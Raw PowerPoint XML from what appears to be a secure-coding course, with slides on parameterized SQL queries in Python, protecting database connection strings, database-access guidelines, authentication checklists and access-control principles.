                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                          password='pynative@#29')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     cursor = connection.cursor(prepared=True)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     sql_update_query = """UPDATE Employee set Salary = %s where Id = %s"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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except mysql.connector.Error as error: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     print("parameterized query failed {}".format(error))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     finally: if (connection.is_connected()):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         cursor.close()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         connection.close()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         print("MySQL connection is closed")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query Parameterization (Slide 3 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31789460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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The database connection string :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May provide a potential database vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifies how the application should connect to the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes information such as the name of the database driver, the server name, database name, and credentials such as user name and password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides information an attacker with shell access to the database can use to perform operations directly on the database or back end systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should be protected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for cleartext connection strings in your code, configuration files, registry settings, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even if connection strings are hidden within executable code, an attacker may be able to extract them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database Connection Credential Protection (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163669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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ways to remediate:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obfuscate the password somehow. For example, use password hash instead of a cleartext password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use no password at all.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: On the Windows platform, set “TrustedConnection” to "yes," and define a data source that uses a stored credential for access. The credential is stored as an LSA Secret, which is more secure than cleartext. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various development environments provide tools for protecting connection strings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Integrated security (operating system authentication), which enables processes authenticated by the operating system to access the database without providing a user ID and password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid using connection strings, investigate the platform you are using for secure alternatives to passing cleartext credentials in connection strings.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database Connection Credential Protection (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1493655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result for databas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22" y="1219200"/>
            <a:ext cx="1581803"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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828799" y="1302040"/>
            <a:ext cx="6973275" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require strong credentials for connections and administrative console access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change all database accounts and passwords that were provided by default with the database installation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable or remove all database functionality unneeded by the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete all unnecessary default vendor content and schemas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use strongly typed parameterized queries, stored procedures, and input validation to protect database access from injection attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use strongly typed variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Utilize input validation and output encoding and be sure to address meta characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When input validation and output encoding fail, fail securely. Do not run database commands with bad input.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guidelines for Protecting Database Access (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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descr="Image result for database icon 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descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3446CF63-DBB4-4BB0-9742-1521745CE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816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result for databas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22" y="1219200"/>
            <a:ext cx="1581803"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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828799" y="1302040"/>
            <a:ext cx="6973275" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure your application to connect to the database with different credentials and trust levels for every role (user, read-only user, administrator, and so forth).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure your application to use the lowest possible level of privilege when accessing the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use secure credentials for database access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not hard-code connection strings containing cleartext credentials </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>within the application. Store them in a separate, encrypted configuration file on a trusted system, or find a more secure alternative to connection strings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Close the connection as soon as possible after use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guidelines for Protecting Database Access (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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descr="Image result for database icon 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descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3446CF63-DBB4-4BB0-9742-1521745CE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90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109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection vulnerabilities can compromise an entire application and can be used as a vector for attacks on your other systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this activity, you will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examine how such an attack is possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider its potential for damage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider various methods for preventing such an attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Protecting Database Access</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0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Authentication (Slide 3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Use strong hashing algorithms for credential stores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that the credential store is writeable only by the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate authentication data only after all inputs are provided, especially for sequential authentication implementations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When an authentication fails, give no clues as to which part of the authentication data was incorrect. For example, show no differences between the message displayed for incorrect user name and incorrect password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt and store authentication credentials that your software uses to access external services in a protected location on a trusted system—not within the source code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CCB4547-345C-4443-957F-8AB009A1D692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1160208"/>
            <a:ext cx="1991032" cy="1151641"/>
            <a:chOff x="-2445" y="3873609"/>
            <a:chExt cx="2031700" cy="1175164"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{000209D3-8DA6-4C56-9CD2-B1B173BCD638}"/>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8648DD4F-EB39-4E7E-847D-73CF53ABAE77}"/>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Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D785D0-77E3-4DFD-9C56-2D1B6700B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76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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which of the vulnerabilities and protections covered in this lesson will affect your applications?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can you ensure that you've thoroughly implemented all of the protections that your application requires?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1652198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Authentication (Slide 4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Use only secure channels to transmit authentication credentials—for example, use a POST request over HTTPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable "remember me" functionality for password fields.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Report the date and time of the last successful or unsuccessful login attempt of a user account to the user at the next successful login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor the system for attacks against multiple user accounts that use the same password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use multifactor authentication for highly sensitive or high value transactional accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not permit concurrent logins using the same ID.</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CCB4547-345C-4443-957F-8AB009A1D692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1160208"/>
            <a:ext cx="1991032" cy="1151641"/>
            <a:chOff x="-2445" y="3873609"/>
            <a:chExt cx="2031700" cy="1175164"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{000209D3-8DA6-4C56-9CD2-B1B173BCD638}"/>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8648DD4F-EB39-4E7E-847D-73CF53ABAE77}"/>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Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D785D0-77E3-4DFD-9C56-2D1B6700B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1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Access Control (Slide 1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901070" cy="5246070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify all resources that must be protected, and provide access only to authorized users. Consider resources such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Files, including those outside the application's direct control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protected URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protected functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User and data attributes and policy information used by access controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security configuration information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a centralized (e.g., sitewide) component to check for access authorization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that access authorization controls fail to the most secure state.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for access authorization on every request from </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>components, including server-side scripts, AJAX, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Flash.</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F540F4D-5E4B-4A79-B63E-2102D18FABB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1171753"/>
            <a:ext cx="1906715" cy="1054282"/>
            <a:chOff x="-9832" y="1171753"/>
            <a:chExt cx="1906715" cy="1054282"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2759299-6F3A-478F-B52E-979E3772E024}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="4500000">
              <a:off x="461759" y="790910"/>
              <a:ext cx="1054282" cy="1815967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8648DD4F-EB39-4E7E-847D-73CF53ABAE77}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20723103">
              <a:off x="-9832" y="1639820"/>
              <a:ext cx="1344145" cy="230958"/>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Authorization</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93F3EBA-6CE5-43DB-802C-9051DB064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2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Access Control (Slide 2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Deny all access if the application cannot access its security configuration information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep code that requires privileged access separate from other unprivileged code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
